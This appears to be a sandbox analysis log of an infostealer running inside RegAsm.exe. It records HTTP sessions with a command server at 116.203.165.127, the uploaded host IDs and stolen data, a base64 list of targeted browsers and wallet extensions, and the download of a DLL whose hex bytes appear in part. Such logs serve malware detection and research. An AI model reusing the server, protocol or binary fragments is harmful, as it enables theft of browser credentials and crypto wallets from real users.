2024-09-20 09:07:24 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-20 09:07:25 UTC	10062	IN	Data Raw: 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 Data Ascii: destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><di
2024-09-20 09:07:25 UTC	10164	IN	Data Raw: 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 Data Ascii: mmunity.akamai.steamstatic.com\/","COMMUNITY_CDN_ASSET_URL":"https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/","STORE_CDN_URL":"https:\/\/store.akamai.steamstatic.com\/","PUBLIC_SHARE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:25 UTC	188	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:27 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCGCFCAFIIEBGCBFCAKK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:27 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 47 43 46 43 41 46 49 49 45 42 47 43 42 46 43 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 34 37 42 41 31 33 41 32 38 30 31 31 32 38 30 35 36 36 34 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 43 46 43 41 46 49 49 45 42 47 43 42 46 43 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 43 46 43 41 46 49 49 45 42 47 43 42 46 43 41 4b 4b 2d 2d 0d Data Ascii: ------FCGCFCAFIIEBGCBFCAKKContent-Disposition: form-data; name="hwid"A747BA13A2801128056648-a33c7340-61ca------FCGCFCAFIIEBGCBFCAKKContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------FCGCFCAFIIEBGCBFCAKK--
2024-09-20 09:07:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:27 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|ae7d5bf440a6935a5872fa237139b5f6\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:28 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJEBAECGCBKECAAAEBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:28 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------IIJEBAECGCBKECAAAEBFContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------IIJEBAECGCBKECAAAEBFCont
2024-09-20 09:07:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:29 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:29 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:29 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------DAAAFBKECAKEHIEBAFIECont
2024-09-20 09:07:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:30 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:31 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCGHDHIDHCBGCBGCAEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:31 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------DHCGHDHIDHCBGCBGCAEBContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------DHCGHDHIDHCBGCBGCAEBContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------DHCGHDHIDHCBGCBGCAEBCont
2024-09-20 09:07:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:31 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:32 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 7741 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:32 UTC	7741	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------IDHIIJJJKEGIDGCBAFIJCont
2024-09-20 09:07:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:33 UTC	196	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:34 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:33 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Friday, 20-Sep-2024 09:07:33 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-20 09:07:34 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-20 09:07:34 UTC	16384	IN	Data Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-20 09:07:34 UTC	16384	IN	Data Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-20 09:07:34 UTC	16384	IN	Data Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$
2024-09-20 09:07:34 UTC	16384	IN	Data Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b Data Ascii: D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
